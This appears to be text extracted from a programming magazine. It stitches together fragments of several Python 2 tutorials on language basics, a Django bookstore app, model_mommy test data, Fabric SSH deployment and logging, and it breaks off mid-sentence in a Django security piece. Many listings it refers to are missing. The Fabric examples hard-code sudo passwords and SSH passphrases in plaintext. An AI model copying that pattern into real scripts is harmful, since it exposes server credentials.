//     powers = (n, n*n, n*n*n)
//     numbers[n] = powers
//     return powers
static PyObject *
insert_powers(PyObject *self, PyObject *args)
{
    PyObject *numbers;
    int n;
Arithmetic operators
Python also has arithmetic operators such as addition, subtraction, multiplication and division. You can
easily use these standard operators with numbers to write arithmetic code.
Python supports multiplying strings to build a string with a repeating sequence, for example:

lotsofhellos = "hello" * 10

Python also supports creating new lists with a repeating sequence, using the multiplication operator on a list, for example:

print [1,2,3] * 3
Now, it's time to try a simple mathematical program in Python. Here are some simple basic operations of
Python, the names they are called by in Python, and how you can use them:

Name            Example   Output
Addition        4 + 4     8
Subtraction     8 - 2     6
Multiplication  4 * 3     12
Division        18 / 2    9
Remainder       19 % 3    1
Exponent        2 ** 4    16
In an expression such as 1 + 2 * 3, the machine first calculates 2 * 3 and then adds 1 to it, because multiplication
has a higher priority than addition. In (1 + 2) * 3, the machine first calculates 1 + 2
and then multiplies it by 3, because parentheses have a higher priority than the operators outside them. In Python, the math is
calculated from left to right if not put in parentheses, and it is
important to note that the innermost parentheses are calculated first. For example:

>>> 4 - 40 - 3
-39
>>> 4 - (40 - 3)
-33

In the first example, 4 - 40 is evaluated first and then 3 is subtracted from the result. In the other one, 40 - 3 is evaluated first and then the result is
subtracted from 4.
Python is one of the high-level languages available these days. It is one of the easiest languages to learn and
use, and at the same time it is very popular. It is widely used by many professional
programmers to create dynamic and extensive applications. Google, Industrial Light and Magic, the New York
Stock Exchange and other such giants use Python. If you have your own computer, you can download
and install it easily. Python is free; you can start coding in Python now!
For more information visit: www.widevisiontechnologies.com/.
Python Interpreter
As you know by now, Python is an interpreted language, and its interpreter runs on multiple
platforms such as Windows, Linux, Mac OS X and other UNIX distributions; there is even SL4A, which contains a Python
interpreter that runs on Android. Linux and Mac OS X come with Python 2.7 preinstalled; if you are
using Windows, you can download IDLE (the Python IDE), which has lots of features aside from the interpreter. In
this tutorial, we will be using the interactive programming environment, which can be accessed through the
terminal in Linux and other Unix distributions, and also through IDLE.
Getting Started
Enough chit chat. If you are using Windows, I presume you have installed IDLE; once you open it, it will
give you an interactive environment with the Python prompt >>> instantly. For Linux/Unix users, open the
terminal and type

$ python

at your shell prompt, press Enter and you should have the Python prompt >>>. Note: when defining functions or
blocks with more than one line, the interpreter shows "..." to indicate a continuation.
With our Python prompt ready, we are going to do some calculations and store the results in variables.

>>> a = 2        # variable a stores 2
>>> b = 3        # variable b stores 3
>>> sum = a+b    # variable sum stores the value of a+b

Now sum contains the sum of a and b. How do we know if this actually worked? Well, let's print the
value of sum and see:

>>> print sum
5
>>> sub = 50 - 20
>>> print sub
30
Yes, it's as easy as that. Unlike C, Java, etc., you do not need to compile your code in order to see the output;
this is an interpreted language, and when using the interactive programming environment we get outputs
immediately. Let's do some multiplication and division.

>>> product = 3*6
>>> print product
18
>>> div = 5/2
>>> print div
2

I know you want to ask a question: how did 5/2 become 2, right? Yes, it's 2, because our answer has been
rounded down to the nearest integer. If we want our answer as a float, we can simply divide as in Listing 1.
Listing 1. Division and modular
>>> div = 5/2.0
>>> print div
2.5
>>> mod = 10 % 2
>>> print mod
0
Importing Modules
Now, what if we want to calculate the square root of a number? Square root is not one of
Python's built-in functions (the built-in functions can be found here: http://docs.python.org/2/library/functions.
html#raw%5Finput), but fortunately there are lots of tools provided with Python, and one of those is the
math module.
A module is a file that contains variable declarations, function implementations, classes, etc. We can
make use of these functions and variables by importing the module into our environment. Let's get to practice;
this is how you import a module into your environment:
>>> import math
And now we have imported that module with all its tools; somewhere in it is the square root function, which
we can call using:

>>> math.sqrt(25)
5.0
You see that we used math.sqrt(). What if we just want to use sqrt()? Well, there is a way: we import sqrt as
shown in Listing 2.
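A minimal version of that import looks like this:

>>> from math import sqrt
>>> sqrt(25)
5.0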
Also, we can concatenate strings together by the use of the + operator, like this:

>>> print "Jane" + " " + "Doe"
Jane Doe
Note: there is another way of taking user input, using input(), but I don't advise using it for now, until
you really know what you are doing. The fact is that whatever you pass to input() gets evaluated: if you type, for
instance, 3, expecting the string "3", it gets evaluated and converted to an integer, and that can cause
a whole lot of trouble. So just avoid it.
Enough with the basics, lets get down to some data structures.
Lists
Lists are very similar to arrays: they can store elements of any type and contain as many elements as you
want. Let's take a look at declaring a list and storing elements in it:

>>> myList = []

This declares an empty list for you, and you can populate it with elements using a method provided by
the list object, append; see Listing 3. You can also print the element at a specific location like this:

>>> print myList[0]
1
You can learn more about other list functions here http://docs.python.org/2/tutorial/datastructures.html.
Listing 3. Adding elements to a list

>>> myList.append(1)
>>> myList.append(2)
>>> myList.append(3)
>>> print myList
[1, 2, 3]
48
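A for loop visits the elements of a list one at a time; for instance, with a hypothetical list of goods (the names are mine, chosen to match the discussion below):

>>> goods = ["bread", "milk", "eggs"]
>>> for item in goods:
...     print item
...
bread
milk
eggs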
Now, this may be a bit new to some. What was done here is: we go through each element in the goods list using a for
loop, and the loop variable takes on each of the elements one after the other until there are no more elements,
with the loop body evaluated at each stage.
Functions
Functions are a way to divide our code into a modular structure, to enable reuse and readability and to save time.
If there is a particular process that is written over and over again, this can be repetitive and inefficient;
when we define it as a function, we can easily call it whenever it's needed.
I will show you how a function is written:
>>> def function(args):
...     print args

This is a simple function that prints whatever is passed to it, and you can test it by running this:

>>> function("name")
name
It prints out what you pass to it. We can also return values from a function. Take, for instance, a
function that takes in two numbers, adds them together and returns the value:

>>> def add(a, b):
...     return a+b

Exactly nothing happened, because we did not print the returned value. Now let's store what is returned in a
variable and print it out:

>>> sum = add(2, 4)
>>> print sum
6
Comments
Commenting code is a good practice for programmers: it helps whoever reads your code to understand what you were
doing, and it is sometimes helpful when modifying or updating your code. Comments in Python are stripped out
during parsing, and we write a comment in Python by putting # before the line we want to comment. Like this:

>>> # this is a comment
>>>
Docstring
Now that you have learned how to use variables, modules, operators, conditional statements, iterators,
functions and lists, let's introduce something called a docstring.
A docstring is a string literal that is used to document code, usually stating what a particular function, class
or module does. Unlike comments and other types of documentation, a docstring is not stripped from the
source code during parsing, but is retained and can be inspected together with the source file. This allows us to
document our code completely within the source code. A docstring is written within three opening and closing
quotes, e.g. """contents""". Let's see how this is written; see the example in Listing 5.
Listing 5. Format of Docstring

"""Source defining the Animal class, containing one method, and another separate method"""

class Animal(object):
    def talk(self):
        """Method that shows how animals talk"""

def mate(animal):
    """Method for mating animals"""
Now, what if we want to view the docstring of a function, to learn what that function does or how to use it?
Well, we can use the help() function; it prints the docstring of that function. Let's see Listing 6.
Listing 6. Using help() to learn more about a function's usage and definition (printing the docstring)

>>> import math
>>> help(math.pow)
Help on built-in function pow in module math:

pow(...)
    pow(x,y)

    Return x**y (x to the power of y).    <- this is the docstring
See that? We learnt a lot about the pow() function by printing the docstring of pow() using help().
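A related introspection helper is dir(), which the next paragraph refers to; a quick illustration (output abbreviated):

>>> myList = [1, 2, 3]
>>> dir(myList)
['__add__', '__class__', ..., 'append', 'count', 'extend', 'index', 'insert', 'pop', 'remove', 'reverse', 'sort']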
First we defined a list object and then passed it to dir(), and it returned all the methods that are applicable to
this particular object.
Summary
This document is just an introduction to Python. It is designed to make you comfortable with the
environment and with some concepts, tricks and methods of the Python programming language, and it will help you
to learn more advanced topics on your own. I advise you to keep practicing and creating different tasks
for yourself. That is the only way you will become a good software developer.
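The creation command described next comes from virtualenvwrapper (the workon command used below belongs to the same package); it would look something like this, with the interpreter path being my assumption:

mkvirtualenv --no-site-packages --clear -p /usr/bin/python2.7 sdjournal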
This command creates a Python virtual environment called sdjournal, with no references to other installed
libraries (--no-site-packages --clear) and using a Python 2.x interpreter.
Note: Django works with both Python 2.x and Python 3.x, but many third-party applications are
developed using Python 2.x (the 2.x version is the safer one to use).
In the future, to access the virtual environment shell you are required to activate it:

workon sdjournal
Now that the environment and some base libraries are installed, we can create a simple Django project (a book
store). Be sure to be in the virtualenv directory (cdvirtualenv) and type:

django-admin.py startproject mybookstore

After having installed Django, the django-admin.py command is available in the virtualenv. It allows
executing a lot of administrative commands, such as project management, database management, i18n
(translation) management, and so on. The syntax is django-admin.py <command>. The startproject command above
creates some files, such as:

mybookstore/manage.py
mybookstore/mybookstore
mybookstore/mybookstore/__init__.py
mybookstore/mybookstore/settings.py
mybookstore/mybookstore/urls.py
mybookstore/mybookstore/wsgi.py
Set up the media directory, which contains uploaded media files. This is controlled by the MEDIA_ROOT
setting; we'll set it to the media directory in the virtualenv root:

MEDIA_ROOT = os.path.join(os.path.dirname(os.getcwd()), 'media')

Set up the static directory, which contains static files such as images, JavaScript and CSS. This is
controlled by the STATIC_ROOT setting; we'll set it to the static directory in the virtualenv root:

STATIC_ROOT = os.path.join(os.path.dirname(os.getcwd()), 'static')

Set up the installed applications. In the INSTALLED_APPS setting, we must put the list of all the applications that
we want installed and available in the current project.
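The app itself is created with manage.py's startapp command; given the name used below, that would be:

python manage.py startapp bookshop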
This command creates a new app/directory called bookshop containing these files:

__init__.py: marks the directory as a Python package.
models.py: the file that will contain the models of this app. Initially it contains no objects.
tests.py: the unittest file for this application. This file contains a test stub to start with.
views.py: this file contains the views that are used in this application. The standard file is empty.
Generally an app directory contains some other files, such as:

admin.py: contains the administrative interface definition for the application. We'll have a quick
look at it at the end of the article.
urls.py: contains the app's custom url routing.
migrations directory/package: present if the south app is installed and the app contains migrations. This directory
stores all the model changes.
management directory/package: contains scripts that are executed on syncdb and custom application
commands.
static directory: contains application-related static files (i.e. js, css, images).
templates directory: contains HTML templates used for rendering.
templatetags: contains custom template tags and filters used for rendering in this application.
Now that we have created an application, we must add it to the INSTALLED_APPS list to enable it. In settings.py,
the INSTALLED_APPS setting will be:

INSTALLED_APPS = (
    'django.contrib.auth',
    'django.contrib.contenttypes',
Django takes care of creating missing tables and populating the initial database with the syncdb command:

python manage.py syncdb

The first time it's executed, if there is no superuser, the command asks to create one and guides the user
through creating an admin account.
The syncdb command creates the database if it's missing; if some tables are not available, it creates them with
sequences, indices and foreign key constraints.
Now our semi-complete application can be executed in developer mode, using the built-in Django development server,
with the following command:

python manage.py runserver

It starts a server listening on localhost port 8000, so just navigate to http://127.0.0.1:8000 to see your site.
NOTE: generally, for common tasks the Django user doesn't need to know the SQL language, as the
Django ORM manages it transparently across multiple DBMSs (Oracle, MySQL, PostgreSQL, SQLite). Django doesn't
require its users to have SQL knowledge.
This command creates the required tables, sequences and indices for the currently installed applications.
Django's url control is based on regular expressions. In our example, the first url command registers an
empty string pattern, a view index (expanded to bookshop.views.index) and a name to call this url by. The second
url command registers a book_id value to be passed as a variable to a detail view (formally bookshop.views.detail),
and the name of this url.
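The routing being described would look roughly like this in the Django 1.x style of the time (a sketch reconstructed from the prose; only the names are taken from the article):

from django.conf.urls import patterns, url

urlpatterns = patterns('bookshop.views',
    url(r'^$', 'index', name='index'),
    url(r'^(?P<book_id>\d+)/$', 'detail', name='detail'),
)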
During url dispatching, Django tries to find the correct view to serve, based on regular expression matching.
A view function is a simple Python function that returns a Response object or one derived from it. We need to
define two views, index and detail (Listing 3).
The index needs to show all the available books: we create a context with a books queryset and we render
it with an HTML template. The queryset, accessible for every model using the objects attribute, is an ORM
element that allows executing queries on data without using SQL; the Django ORM takes care of creating and
executing the SQL code. In the index, Book.objects.all() retrieves all the book objects.
The detail view, which takes a parameter book_id passed by url routing, creates a context with a variable
book which contains the Book data. In this case, the queryset method used executes a query with the given
parameters and returns a Book object or raises an exception. If there is no book with pk equal to the book_id variable,
an HTTP 404 error is returned: this fallback protects against nasty users' url manipulation.
{{ value }} or {{ value0.method1.value2 }} outputs a variable; attributes and methods are reached with dots.
{{ value|filter }} is used to transform a value with a filter: a value transformation such as text formatting
or number and date/time formatting. A filter returns a value that can be passed to another filter.
{% tagname %} is used to process tags: functions that extend HTML capabilities (see
https://docs.djangoproject.com/en/dev/ref/templates/builtins/ for the built-in ones).
Generally the templates of an application live in the templates subdirectory of the application itself. The
shop/index.html page will have a template similar to Listing 4.
Listing 4. shop/index.html template used to render the index page
<!DOCTYPE html>{% load i18n %}
<html><head><title>{% trans "Index of books" %}</title></head>
<body>
<h1>{% trans "Book List" %}</h1>
<ul>
{% for book in books %}
  <li><a href="{% url 'shop:detail' book.pk %}">
    {{ book.title }} {% trans "by" %} {{ book.author }}</a>
  </li>
{% endfor %}
</ul>
</body></html>
Also the shop/details.html template is very simple: Listing 5. The Django tags used in these templates are:
load: allows loading a tag library into the rendering context. I loaded i18n to auto-localize strings
(translate strings into your local language).
trans: marks a string for translation.
for...endfor: iterates over the items of a sequence.
url: builds an address from a named URL pattern.
empty: inside a for loop, rendered when the sequence is empty.
if...else...endif: conditional rendering.
Template tags and filters are very powerful tools; many libraries are available online that extend the template
engine with AJAX helpers, pagination, and more.
The results are shown in the following images (Figure 2 and Figure 3).
In this article we have chosen to keep the templates simple. It is very easy to create cool sites using CSS
templating such as Twitter Bootstrap or other JavaScript/CSS web frameworks such as YUI or jQuery.
To register some models in the admin interface, a new file in our application directory is required:
bookshop/admin.py (Listing 7).
Listing 7. bookshop/admin.py bookshop admin file
from django.contrib import admin
from bookshop.models import Book, Author, Tag

class BookAdmin(admin.ModelAdmin):
    list_display = ('title', 'author', 'available', 'in_stock', 'price')
    search_fields = ['title', 'description']
    list_filter = ('available', 'in_stock', 'price')

admin.site.register(Book, BookAdmin)
admin.site.register(Author)
admin.site.register(Tag)
Registering a model in the admin is very simple; it's enough to call the admin.site.register method with the
model that we want to register.
list_display: contains a list of field names that must be shown as columns in the admin list view table.
search_fields: the list of fields searched when using the admin search box.
list_filter: the fields used to build the filter sidebar in the list view.
The following images show the admin book list view and the admin editing view (Figure 4 and Figure 5).
Conclusions
In this article we have had a quick briefing on how easy and powerful Django is. We have seen the installation,
the creation of an application, the basic models-views-templates structure of Django and the admin interface
setup. These elements are the skeleton to build anything from simple sites to big and complex ones.
If you are impatient, the tutorials and documentation on the Django site are good places to start; otherwise,
in the next articles we'll go deeper into these features and introduce many others, such as the cache,
user/group management, middleware, custom filters and tags, and more.
class Tag(models.Model):
    tag = models.CharField(max_length=50)
class Category(models.Model):
    name = models.CharField(max_length=50)
    description = models.CharField(max_length=300)

class User(models.Model):
    username = models.CharField(max_length=50)
    password = models.CharField(max_length=128)
    first_name = models.CharField(max_length=50)
    last_name = models.CharField(max_length=50)
    email = models.CharField(max_length=100)

class Post(models.Model):
    title = models.CharField(max_length=300)
    body = models.TextField()
    date = models.DateTimeField()
    user = models.ForeignKey(User)
    category = models.ForeignKey(Category)
    tags = models.ManyToManyField(Tag)

class Comment(models.Model):
    body = models.CharField(max_length=256)
    date = models.DateTimeField()
    post = models.ForeignKey(Post)
    user = models.ForeignKey(User)
Now suppose we need to write a test relating to the Post model. Let's assume we want to write a test to
verify that a view that renders a post shows the post's category correctly. At minimum, this requires having
several objects: at least a Post, a Category, and a User. The standard method of testing Django applications
requires placing these into a fixture. Fixtures are serialized data in disk files that can be stored in JSON,
XML, or YAML format. Fixtures can be created by hand, but this is not recommended. Django provides a
command to serialize the data in your current database by running the command: python manage.py dumpdata.
By default, this will serialize the data into JSON format to standard output. For our data model, if we wanted
to have a fixture to test a Post, the smallest fixture we could use might look something like this: Listing 3.
Listing 3. A minimal fixture for our data model
[
  {
    "fields": {
      "description": "TestDescription",
      "name": "TestCategory"
    },
    "model": "blog.category",
    "pk": 1
  },
  {
    "fields": {
      "body": "Test Body",
      "category": 1,
      "date": "2013-08-09T00:21:32.766Z",
      "tags": [],
      "title": "Test Post",
      "user": 1
    },
    "model": "blog.post",
    "pk": 1
  },
  {
    "fields": {
      "email": "test@user.com",
      "first_name": "test",
      "last_name": "user",
      "password": "",
      "username": "TestUser"
    },
    "model": "blog.user",
    "pk": 1
  }
]
We could use this fixture in our test case, but already some questions may have come to your mind:
How do I make this test data in the first place before calling dumpdata?
How can I reuse this fixture if a different test case needs slightly different test data?
What happens when my data model changes?
Let's return to the task of creating a unit test for ensuring the category name shows up when rendering a
post. In this case, the only piece of test data we care about is the name field of the category. Using
model_mommy, we can write the entire test with just this code: Listing 5. Note that this test case isn't using
fixtures at all; all the data for this test case is generated by this single line:
post = mommy.make(Post, category__name="TestCategory")
In this one line, model-mommy has made for us a Post, a Category, and a User. We have specified the type of
object and the name of the category in the arguments to mommy.make, but nothing else. We didn't need to write
any object factory class by hand. Model-mommy has filled all the unspecified fields with auto-generated data.
Listing 5. Test with model_mommy
from django.test import TestCase
from model_mommy import mommy
from blog.models import Post

class BlogTests(TestCase):
    def test_post_displays_category(self):
        post = mommy.make(Post, category__name="TestCategory")
        # hypothetical URL that renders a single post
        response = self.client.get("/post/{}/".format(post.pk))
        self.assertContains(response, "TestCategory")
We don't control this data (although as we'll see later, we can tell model-mommy how to generate these
fields), but for this test case this data is irrelevant, since we are not making any assertions about it.
Compared to using fixtures, some advantages may be immediately obvious:
We didn't have to separately make a Post, Category, and User model instance; model_mommy can make
an entire object graph in one invocation.
We didn't have to generate any data ahead of time; all the data is made inside the test itself.
Since all the test data is inside the test itself, it is easy to see by quick visual inspection that the assertions
match the data.
Tests written in this style are quicker to write and easier to read compared to using a fixture. Further, let's
suppose we add a field hometown to the User model. If we are using fixtures, we have to regenerate
every fixture that contains a User instance. With model-mommy, we will end up creating new Users with
hometown fields automatically populated. You only need to specify a hometown in tests that make assertions
about it, which presumably you will write only after you create the new field. All of your existing tests
should continue to run.
new_model = mommy.make(Model, field1="value1", field2="value2")
This instructs model-mommy to make an instance of a hypothetical Model class, specifying values for
field1 and field2. If Model contains other fields, model-mommy will automatically generate values for
these fields. The instance is persisted in the configured database immediately, thus it will be visible
to subsequent code. You can use the mommy.prepare method if you don't want the new instance to be
persisted in the database.
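A quick sketch of the difference:

saved = mommy.make(Post)        # persisted: saved.pk is set
unsaved = mommy.prepare(Post)   # built but not saved: unsaved.pk is None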
Model-mommy will automatically create any foreign-key related models that you don't specify. If you
need to specify fields on these auto-generated models, you can tell model-mommy to create these fields in
one step using a double underscore notation similar to the Django ORM:
new_model = mommy.make(Model, related__field="test")
assert new_model.related.field == "test"
Using this notation, you can often create data for a test in a single line of code. However, if you are
generating many fields, it can be easier to generate data in multiple steps:
new_user = mommy.make(User, username="testuser", email="t@t.com")
new_post = mommy.make(Post, title="test", user=new_user)
If you do want to control how model-mommy generates unspecified fields, you can define a Recipe that
tells model-mommy how to generate the fields you want specified: Listing 6.
Listing 6. Specifying fields
>>> from model_mommy import mommy
>>> from model_mommy.recipe import seq, Recipe
>>> category_recipe = Recipe(Category, name=seq("Test"))
>>> category_recipe.make().name
'Test1'
>>> category_recipe.make().name
'Test2'
In the above example we use the seq function, which allows you to make unique values for multiple instances.
Recipes can also use callables to programmatically generate fields. Recipes can also use other recipes to create
foreign keys. Suppose we wanted to be able to create multiple posts, all with unique dates and unique users.
We could do this as follows: Listing 7.
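A sketch of such a recipe, combining seq, a callable and foreign_key (model names as above; the exact recipe in the article may differ):

from datetime import datetime
from model_mommy.recipe import Recipe, seq, foreign_key

# every User gets a unique username; every Post gets its own User
# and a per-instance timestamp (datetime.now is called once per make())
user_recipe = Recipe(User, username=seq("user"))
post_recipe = Recipe(Post,
                     date=datetime.now,
                     user=foreign_key(user_recipe))

posts = [post_recipe.make() for _ in range(3)]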
For simple test cases, you can get by without needing to specify recipes. However, if you need more control
over how model-mommy generates data, recipes can help you accomplish this.
user = mommy.make(User)
posts = mommy.make(Post, user=user, _quantity=50)
response = self.client.get("/user/{}".format(user.username))
self.assertContains(response, "gold star")
In this example we used model-mommy's shortcut of passing the _quantity argument to mommy.make to
create many models at once. We could have just as easily created the models in our own loop, but using
_quantity can be convenient. We tell the make function to generate each one with the same generated
user. Model-mommy will automatically generate categories for all of our posts, since we didn't specify
one on invocation.
If we had wanted to do this with a fixture, we'd have to write a script to generate a large amount of test
data, and use the dumpdata management command to turn this data into a JSON fixture. Most likely we'd
have to check both this script and the resulting fixture into our project's source control, and change them
if the schema of User or Post ever changed. Using model-mommy, all these steps are replaced with one
line of code.
Summary
Using specific examples, I've shown how using model-mommy can make your Django unit tests much
more concise, simpler, and robust. We covered some basic patterns of how to use model-mommy to build
simple test cases with simple as well as repeated data. I'd like to thank Vanderson Mota dos Santos and the
entire model-mommy development community for their helpful contributions to the Django development
community. Hopefully the methods shown in this article can greatly simplify the writing of tests in your
Django applications, leading to better test coverage and more robust code. More importantly, by removing
unnecessary data and boilerplate, it just makes writing tests more fun.
After installing it, you may update it to the latest version using pip itself:
$ sudo pip install pip --upgrade
To work with Fabric, you must have SSH installed and properly configured with the necessary user
permissions on the remote servers you want to work on. In the examples, we will consider a Debian
system with IP address 192.168.250.150 and a user named administrator with sudo powers, which are
required only for performing actions that need superuser rights. One way to use Fabric is to create a
file called fabfile.py containing one or more functions that represent the tasks we want to execute; for
example, take a look at Listing 1.
Listing 1. A basic fabfile. File: fabfile.py
# -*- coding: utf-8 -*-
from fabric.api import *

env.hosts = ["192.168.250.150"]
env.user = "administrator"

def remote_info():
    run("uname -a")

def local_info():
    local("uname -a")
In this case, Fabric will ask for the password of the user administrator, as it is connecting to the server via
SSH, as shown in Listing 3.
Listing 3. Output of fab remote_info
[192.168.250.150] Executing task 'remote_info'
[192.168.250.150] run: uname -a
[192.168.250.150] Login password:
[192.168.250.150] out: Linux ...
Done.
Disconnecting from 192.168.250.150... done.
There are lots of parameters that can be used with the fab command. To obtain a list with a brief description
of them, you can run fab --help. For example, by running fab -l it is possible to check the Fabric tasks
available in the fabfile.py file. Considering we have the fabfile.py file shown in Listing 1, we obtain the
output of Listing 4 when running fab -l.
Listing 4. output of fab -l
Available commands:
local_info
remote_info
As in the previous example, in the file fabfile.py, the function run() may be used to run a shell command on
a remote server and the function local() may be used to run a shell command on the local computer. Besides
these, there are some other possible functions to use in fabfile.py:
sudo(shell command): to run a shell command on the remote server with superuser privileges;
put(local path, remote path): to send a local file to a remote path on the remote server;
get(remote path, local path): to get a file from a remote path on the remote server to the local path on
the local computer.
Also, it is possible to set many other details about the remote connection with the dictionary env. To see a
full list of env vars that can be set, visit:
http://docs.fabfile.org/en/1.6/usage/env.html#full-list-of-env-vars.
Among the possible settings, it's worth spending some time commenting on a few of them:
user: defines which user will be used to connect to the remote server;
hosts: a Python list with the addresses of the hosts that Fabric will connect to in order to perform the tasks.
There may be more than one host, e.g.,
env.hosts = ["192.168.250.150", "192.168.250.151"]
host_string: with this setting, it is possible to configure a user and a host at once, e.g.
env.host_string = "administrator@192.168.250.150"
As you may have noticed from the previous example, Fabric will ask for the user's password to connect to the
remote server.
However, for automated tasks, it is desirable to make Fabric run the tasks without prompting for
any user input. To avoid the need to type the user's password, it is possible to use the env.password setting,
which permits you to specify the password to be used by Fabric, e.g.
env.password = "mysupersecureadministratorpassword"
If the server uses SSH keys instead of passwords to authenticate users (actually, this is a good practice
concerning the server's security), it is possible to use the setting env.key_filename to specify the SSH key to
be used. Considering that the public key ~/.ssh/id_rsa.pub is installed on the remote server, you just need to
add the following line to fabfile.py:
env.key_filename = "~/.ssh/id_rsa"
It is also a good security practice to forbid root user from logging in remotely on the servers and allow
the necessary users to execute superuser tasks using the sudo command. On a Debian system, to allow the
administrator user to perform superuser tasks using sudo, first you have to install the package sudo, using:
# apt-get install sudo
and then, add the administrator user to the group sudo, which can be done with:
# adduser administrator sudo
With this done, you can use the sudo() function in Fabric scripts to run commands with sudo powers.
For example, to create a mydir directory within /home, you may use the fabfile.py file shown in Listing 5.
Listing 5. Script to create a directory. File: fabfile.py
# -*- coding: utf-8 -*-
from fabric.api import *

env.hosts = ["192.168.250.150"]
env.user = "administrator"
env.key_filename = "~/.ssh/id_rsa"

def create_dir():
    sudo("mkdir /home/mydir")
Then call:
$ fab create_dir
which will ask for the password of the user administrator to perform the sudo tasks, as shown in Listing 6.
Listing 6. Output of fab create_dir
[192.168.250.150] Executing task 'create_dir'
[192.168.250.150] sudo: mkdir /home/mydir
[192.168.250.150] sudo password:
[192.168.250.150] out:
Done.
Disconnecting from 192.168.250.150... done.
When using SSH keys to log in to the server, you can use the env.password setting to specify the sudo
password, to avoid having to type it when you call the Fabric script. In the previous example, adding:
env.password = "mysupersecureadministratorpassword"
would be enough to make the script run without the need for user intervention.
However, some SSH keys are created using a passphrase, required to log in to the server. Fabric treats these
passphrases and passwords similarly, which can sometimes cause confusion. To illustrate Fabric's behavior,
consider that the user named administrator is able to log in to a remote server only by using his/her key named
~/.ssh/id_rsa2.pub, created using a passphrase, and the Fabric file shown in Listing 7.
Listing 7. Example fabfile using an SSH key with a passphrase. File: fabfile.py
# -*- coding: utf-8 -*-
from fabric.api import *

env.hosts = ["192.168.250.150"]
env.user = "administrator"
env.key_filename = "~/.ssh/id_rsa2"

def remote_info():
    run("uname -a")

def create_dir():
    sudo("mkdir /home/mydir")
Running fab remote_info makes Fabric ask for a Login password. However, as you shall notice, this Login
password refers to the passphrase necessary to log in using the SSH key, as shown in Listing 8.
Listing 8. Output of fab remote_info
[192.168.250.150] Executing task 'remote_info'
[192.168.250.150] run: uname -a
[192.168.250.150] Login password:
[192.168.250.150] out: Linux ...
Done.
Disconnecting from 192.168.250.150... done.
In this case, if you specify the env.password setting, it will be used as the SSH passphrase and, when running
the create_dir script, Fabric will ask for the password of the user administrator. To avoid typing any of
these passwords, you may define env.password as the SSH passphrase and, within the function that uses sudo(),
redefine it as the user's password, as shown in Listing 9.
Listing 9. Example fabfile using an SSH key with a passphrase, improved to avoid the need for user intervention. File: fabfile.py
# -*- coding: utf-8 -*-
from fabric.api import *

env.hosts = ["192.168.250.150"]
env.user = "administrator"
env.key_filename = "~/.ssh/id_rsa2"
env.password = "sshpassphrase"

def remote_info():
    run("uname -a")

def create_dir():
    env.password = "mysupersecureadministratorpassword"
    sudo("mkdir /home/mydir")
Alternatively, you could specify the authentication settings from within the task function, as shown in Listing 10.
Listing 10. Another example fabfile using an SSH key with a passphrase, improved to avoid the need for user intervention. File: fabfile.py
# -*- coding: utf-8 -*-
from fabric.api import *

env.hosts = ["192.168.250.150"]

def create_dir():
    env.user = "administrator"
    env.key_filename = "~/.ssh/id_rsa2"
    env.password = "sshpassphrase"
    run(":")
    env.password = "mysupersecureadministratorpassword"
    sudo("mkdir /home/mydir")
In this example, the command ":" does not do anything. It only serves as a trick to enable setting
env.password twice: first to the SSH passphrase, required for login, and then to the user's password, required
for performing the sudo tasks.
If necessary, it is possible to use Python's with statement (learn about it at http://www.python.org/dev/peps/
pep-0343/) to specify the env settings. A compatible create_dir() task using the with statement is shown
in Listing 11.
Listing 11. Example using Python's with statement. File: fabfile.py
# -*- coding: utf-8 -*-
from fabric.api import *

env.hosts = ["192.168.250.150"]

def create_dir():
    with settings(user="administrator",
                  key_filename="~/.ssh/id_rsa2",
                  password="sshpassphrase"):
        run(":")
        env.password = "mysupersecureadministratorpassword"
        sudo("mkdir /home/mydir")
The fab command is used for performing system administration and application deployment tasks from a
shell console. However, sometimes you may want to execute tasks from within your Python scripts. To do
this, you may simply call the Fabric functions from your Python code. To build a script that runs a specific
task automatically, such as create_dir() shown previously, you create a Python script as shown in Listing 12.
Listing 12. Python script using Fabric. File: mypythonscript.py
#! /usr/bin/env python
# -*- coding: utf-8 -*-
from fabric.api import *

def create_dir():
    with settings(host_string="administrator@192.168.250.150",
                  key_filename="~/.ssh/id_rsa2",
                  password="sshpassphrase"):
        run(":")
        env.password = "mysupersecureadministratorpassword"
        sudo("mkdir /home/mydir")

if __name__ == "__main__":
    create_dir()
As we have seen, with Fabric it is possible to automate the execution of tasks that can be done by executing
shell commands locally and remotely, using SSH. It is also possible to use Fabric's features in other Python
scripts.
To conclude, we show a more practical example of a Python script that uses Fabric to deploy a very basic
HTML application on a server. The script shown in Listing 13 creates a tarball from the local HTML files at
~/website, sends it to the server, expands the tarball, moves the files to the proper directory (/var/www/website)
and restarts the web server. Hopefully this article helped you learn a bit about Fabric so you can automate
some of your tasks!
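A minimal sketch of such a deployment script, using the paths from the text; the apache2 service name is an assumption:

#! /usr/bin/env python
# -*- coding: utf-8 -*-
from fabric.api import *

env.host_string = "administrator@192.168.250.150"

def deploy():
    # build a tarball from the local HTML files
    local("tar czf /tmp/website.tar.gz -C ~/website .")
    # send it to the server and expand it there
    put("/tmp/website.tar.gz", "/tmp/website.tar.gz")
    run("mkdir -p /tmp/website && tar xzf /tmp/website.tar.gz -C /tmp/website")
    # move the files into place and restart the web server
    sudo("rm -rf /var/www/website && mv /tmp/website /var/www/website")
    sudo("service apache2 restart")

if __name__ == "__main__":
    deploy()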
It turns out that rewriting that script to use logging instead just ain't that hard: Listing 2. And here is the
output: Listing 3. Note how we got that pretty view of the traceback when we used the exception method.
Doing that with prints wouldn't be very much fun. So, at the cost of a few extra lines, we got something
pretty close to print statements, which also gives us better views of tracebacks. But that's really just the tip
of the iceberg. This is the same script written again, but I'm defining a custom logger object, and I'm using
a more detailed format: Listing 4. And the output: Listing 5. Now I will change how the script handles the
different types of log messages. Debug messages will go to a text file, and error messages will be emailed to
me so that I am forced to pay attention to them (Listing 6). Lots of really great handlers exist in the
logging.handlers module. You can log by sending HTTP posts, you can send UDP packets, you can write to a
local file, etc.
Listing 1. A script using print statements instead of logging
# This is a.py

def g():
    1 / 0

def f():
    print "inside f!"
    try:
        g()
    except Exception, ex:
        print "Something awful happened!"
    print "Finishing f!"

if __name__ == "__main__":
    f()
inside f!
Something awful happened!
(ZeroDivisionError: integer division or modulo by zero)
Finishing f!
This architecture has a number of other benefits regarding scalability and manageability. But this article is
about security, so let's review some use cases for web security considerations. Specifically: users, passwords,
authentication and authorization.
Basics
Two of the pillars of security are Authentication (who are you?) and Authorization (what are you allowed to do?).
Authentication is not something to be invented. It's something to be used. In our preferred architecture, with
an Apache/Django application, the Django authentication system works nicely for identity management. It
supports a simple model of users, groups and passwords. It can be easily extended to add user profiles.
Django handles passwords properly. This cannot be emphasized enough. Django uses a sophisticated
